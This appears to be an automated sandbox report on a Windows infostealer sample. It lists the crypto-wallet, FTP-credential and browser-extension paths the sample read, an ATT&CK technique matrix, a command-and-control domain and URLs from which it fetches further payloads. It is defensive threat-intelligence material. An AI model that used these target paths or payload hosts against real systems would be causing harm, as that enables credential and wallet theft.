          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6088, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6088, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation
          1
          Registry Run Keys / Startup Folder
          12
          Process Injection
          1
          Masquerading
          2
          OS Credential Dumping
          1
          Query Registry
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          1
          Registry Run Keys / Startup Folder
          34
          Virtualization/Sandbox Evasion
          LSASS Memory751
          Security Software Discovery
          Remote Desktop Protocol41
          Data from Local System
          11
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          12
          Process Injection
          Security Account Manager34
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
          Obfuscated Files or Information
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput Capture114
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials223
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe42%VirustotalBrowse
          file.exe100%AviraTR/Crypt.TPM.Gen
          file.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://property-imper.sbs/.0%Avira URL Cloudsafe
          https://property-imper.sbs/%0%Avira URL Cloudsafe
          https://property-imper.sbs/CC0%Avira URL Cloudsafe
          https://property-imper.sbs/%%0%Avira URL Cloudsafe
          http://crl.micro00%Avira URL Cloudsafe
          https://property-imper.sbs/apihQ0%Avira URL Cloudsafe
          https://property-imper.sbs/e0%Avira URL Cloudsafe
          https://property-imper.sbs/.2%VirustotalBrowse
          https://property-imper.sbs/apiH0%Avira URL Cloudsafe
          https://property-imper.sbs/U0%Avira URL Cloudsafe
          https://property-imper.sbs/$$0%Avira URL Cloudsafe
          https://property-imper.sbs/M0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          property-imper.sbs
          104.21.33.116
          truefalse
            high
            www.google.com
            142.250.181.100
            truefalse
              high
              s-part-0035.t-0009.t-msedge.net
              13.107.246.63
              truefalse
                high
                js.monitor.azure.com
                unknown
                unknownfalse
                  high
                  mdec.nelreports.net
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://property-imper.sbs/apifalse
                      high
                      https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_120.5.drfalse
                          high
                          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_120.5.drfalse
                                high
                                https://www.linkedin.com/cws/share?url=$chromecache_112.5.dr, chromecache_101.5.drfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://property-imper.sbs/CCfile.exe, 00000000.00000003.2173699669.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177722586.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177605541.00000000007E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/Youssef1313chromecache_120.5.drfalse
                                      high
                                      https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_112.5.dr, chromecache_101.5.drfalse
                                        high
                                        https://aka.ms/msignite_docs_bannerchromecache_112.5.dr, chromecache_101.5.drfalse
                                          high
                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_101.5.drfalse
                                            high
                                            http://polymer.github.io/AUTHORS.txtchromecache_112.5.dr, chromecache_101.5.drfalse
                                              high
                                              https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_120.5.drfalse
                                                high
                                                http://crl.micro0file.exe, 00000000.00000003.2256689314.00000000007CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://property-imper.sbs/%file.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_112.5.dr, chromecache_101.5.drfalse
                                                  high
                                                  https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_120.5.drfalse
                                                    high
                                                    http://x1.c.lencr.org/0file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://aka.ms/pshelpmechoosechromecache_112.5.dr, chromecache_101.5.drfalse
                                                          high
                                                          https://aka.ms/feedback/report?space=61chromecache_120.5.dr, chromecache_121.5.drfalse
                                                            high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://learn-video.azurefd.net/vod/playerchromecache_112.5.dr, chromecache_101.5.drfalse
                                                                high
                                                                https://twitter.com/intent/tweet?original_referer=$chromecache_112.5.dr, chromecache_101.5.drfalse
                                                                  high
                                                                  https://github.com/gewarrenchromecache_120.5.drfalse
                                                                    high
                                                                    http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000000.00000002.2446588189.00000000004FB000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://185.215.113.16/steam/random.exeXfile.exe, 00000000.00000003.2365723765.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000776000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://polymer.github.io/CONTRIBUTORS.txtchromecache_112.5.dr, chromecache_101.5.drfalse
                                                                            high
                                                                            https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_120.5.drfalse
                                                                              high
                                                                              https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_120.5.drfalse
                                                                                high
                                                                                https://client-api.arkoselabs.com/v2/api.jschromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                  high
                                                                                  https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                    high
                                                                                    https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                      high
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/Thrakachromecache_120.5.drfalse
                                                                                          high
                                                                                          http://polymer.github.io/PATENTS.txtchromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                            high
                                                                                            https://aka.ms/certhelpchromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                              high
                                                                                              http://185.215.113.16/steam/random.exefile.exe, file.exe, 00000000.00000003.2365723765.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000776000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/mairawchromecache_120.5.drfalse
                                                                                                      high
                                                                                                      https://property-imper.sbs/%%file.exe, 00000000.00000003.2125868783.00000000007E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://schema.orgchromecache_101.5.drfalse
                                                                                                          high
                                                                                                          http://polymer.github.io/LICENSE.txtchromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                                            high
                                                                                                            https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://property-imper.sbs/file.exe, file.exe, 00000000.00000003.2100399838.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173430038.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2365723765.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2355867741.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356772744.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2149998886.00000000054DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://property-imper.sbs/.file.exe, 00000000.00000003.2256766468.000000000542A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • 2%, Virustotal, Browse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://aka.ms/yourcaliforniaprivacychoiceschromecache_120.5.drfalse
                                                                                                                    high
                                                                                                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://github.com/nschonnichromecache_120.5.drfalse
                                                                                                                        high
                                                                                                                        http://185.215.113.16/file.exe, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://property-imper.sbs/efile.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://property-imper.sbs/apihQfile.exe, 00000000.00000003.2173430038.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173699669.00000000007E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                                                            high
                                                                                                                            https://github.com/adegeochromecache_120.5.drfalse
                                                                                                                              high
                                                                                                                              https://property-imper.sbs/apiHfile.exe, 00000000.00000003.2147063638.000000000543A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147221434.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://github.com/jonschlinkert/is-plain-objectchromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                                                                high
                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2148645899.0000000005455000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://octokit.github.io/rest.js/#throttlingchromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                                                                    high
                                                                                                                                    https://property-imper.sbs/Ufile.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://github.com/js-cookie/js-cookiechromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                                                                      high
                                                                                                                                      https://property-imper.sbs/$$file.exe, 00000000.00000003.2147954012.00000000007E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://185.215.113.16/off/def.exefile.exe, file.exe, 00000000.00000003.2365723765.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000748000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361368743.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2447108187.0000000000776000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schema.org/Organizationchromecache_120.5.drfalse
                                                                                                                                          high
                                                                                                                                          https://channel9.msdn.com/chromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                                                                            high
                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2100817934.00000000053E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100878201.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100959136.00000000053E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://property-imper.sbs/Mfile.exe, 00000000.00000003.2256689314.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://github.com/dotnet/trychromecache_112.5.dr, chromecache_101.5.drfalse
                                                                                                                                                high
                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                13.107.246.63
                                                                                                                                                s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                185.215.113.16
                                                                                                                                                unknownPortugal
                                                                                                                                                206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                142.250.181.100
                                                                                                                                                www.google.comUnited States
                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                239.255.255.250
                                                                                                                                                unknownReserved
                                                                                                                                                unknownunknownfalse
                                                                                                                                                104.21.33.116
                                                                                                                                                property-imper.sbsUnited States
                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                IP
                                                                                                                                                192.168.2.5
                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                Analysis ID:1561629
                                                                                                                                                Start date and time:2024-11-24 02:12:07 +01:00
                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 6m 45s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                Number of analysed new started processes analysed:10
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Sample name:file.exe
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@24/67@7/6
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 4
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 178.79.238.0, 192.229.221.95, 172.217.21.35, 172.217.17.46, 74.125.205.84, 23.195.61.164, 23.195.61.229, 34.104.35.123, 172.217.17.42, 142.250.181.74, 216.58.208.234, 142.250.181.106, 172.217.19.234, 172.217.19.202, 172.217.17.74, 142.250.181.10, 142.250.181.42, 23.50.131.71, 23.50.131.72, 172.217.17.67
                                                                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, wcpstatic.microsoft.com
                                                                                                                                                • Execution Graph export aborted for target file.exe, PID 6088 because there are no executed function
                                                                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                TimeTypeDescription
                                                                                                                                                20:13:03API Interceptor55x Sleep call for process: file.exe modified
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                13.107.246.63file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                  CZxDiTktSY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          http://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    239.255.255.250file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                          https://lifetraces.org/spo/priv/auth/login.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                              file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                    CZxDiTktSY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                      https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        185.215.113.16file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                        • 185.215.113.16/mine/random.exe
